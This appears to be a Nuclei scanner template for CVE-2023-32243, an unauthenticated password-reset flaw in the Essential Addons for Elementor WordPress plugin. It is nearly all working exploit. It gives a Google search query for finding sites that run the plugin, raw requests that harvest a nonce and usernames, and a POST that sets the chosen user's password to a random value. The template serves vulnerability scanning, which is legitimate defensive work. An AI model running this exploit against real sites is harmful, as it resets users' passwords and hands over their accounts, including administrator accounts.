id: CVE-2023-32243 info: name: WordPress Elementor Lite 5.7.1 Arbitrary Password Reset author: DhiyaneshDK severity: critical description: | Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-32243 - https://patchstack.com/articles/critical-privilege-escalation-in-essential-addons-for-elementor-plugin-affecting-1-million-sites?_s_id=cve - https://github.com/RandomRobbieBF/CVE-2023-32243/blob/main/exploit.py - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-32243 cwe-id: CWE-287 metadata: max-request: 3 google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite verified: "true" tags: wpscan,cve2023,wordpress,wp-plugin,auth-bypass variables: password1: "{{randstr}}" password2: "{{randstr}}" requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | GET /wp-json/wp/v2/users/ HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 action=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password1}}&eael-pass2={{password2}}&rp_login={{wordpress-username}} host-redirects: true max-redirects: 2 extractors: - type: regex name: nonce part: body_1 group: 1 regex: - 'nonce":"([0-9a-z]+)' internal: true - type: json part: body_2 name: wordpress-username group: 1 json: - '.[] | .slug' - '.[].name' internal: true stop-at-first-match: true matchers-condition: and matchers: - type: word part: body_3 words: - '"success":true' - '"data":' condition: and